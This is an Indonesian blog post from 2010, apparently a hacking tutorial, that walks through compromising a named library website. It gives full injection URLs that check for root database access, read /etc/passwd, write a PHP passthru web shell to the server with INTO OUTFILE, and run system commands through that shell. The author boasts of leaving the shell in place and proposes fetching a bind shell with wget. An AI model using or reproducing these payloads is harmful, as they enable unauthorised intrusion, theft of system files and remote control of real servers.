Selasa, 02 Februari 2010

SQL for spawning shell..

Mohon maaf bagi yang sudah tahu.. ini tutor untuk yang belum tau atau yang sudah lupa..
Oke to the point..

http://perpustakaan.bppt.go.id/perpustakaan_web/beritalengkap.php?vnumber=25+AND+1=2+UNION+SELECT+1,2,user(),4,5,6,7,8,9

Ini web dengan user "root" di mysql, jadi kita bisa ngapain aja menjalankan query dalam injectkan kita...
nah selanjutnya kita cek "phpinfo" nya....

http://perpustakaan.bppt.go.id/phpinfo.php

wah gitu doang ternyata /home/pustaka1
atau selain php info bisa dengan,

http://perpustakaan.bppt.go.id/perpustakaan_web/beritalengkap.php?vnumber=25+AND+1=2+UNION+SELECT+1,2,load_file%28%27/etc/passwd%27%29,4,5,6,7,8,9

kita tahu bahwa web ini belum di patch/di perbaharui jadi kita cari folder pustaka1 bukan pustaka2..
w00t..

pustaka1:x:500:500::/home/pustaka1

lest go to hacking..
kita sudah tau bahwa base dirnya adalah "/home/pustaka1";
nah mulai inject shell...

http://perpustakaan.bppt.go.id/perpustakaan_web/beritalengkap.php?vnumber=25+AND+1=2+UNION+SELECT+1,2,%22%3C?%20passthru%28$_GET[%27fly%27]%29;%20?%3E%22,4,5,6,7,8,9+INTO+OUTFILE+%22/home/pustaka1/flyffs.php%22--

note : direktori harus dengan chmod 0755
penjelasannya,. buat jalanin system. dan INTO OUTFILE adalah code sql buat masukin / membuat file baru yang belum ada..
nah lets go to shell..
exec this shell...

http://perpustakaan.bppt.go.id/flyffs.php?fly=cat+/etc/passwd;id;whoami;pwd;ifconfig;uname%20-a

begh mantab .. haha
warning! dont remove this shell, this shell for education.

langkah selajutnya adalah "wget http://shell lo buat ngebind" .. kalo di server ini wget di disable..

nah sekian tutor ini dari saya..

Tidak ada komentar:

Posting Komentar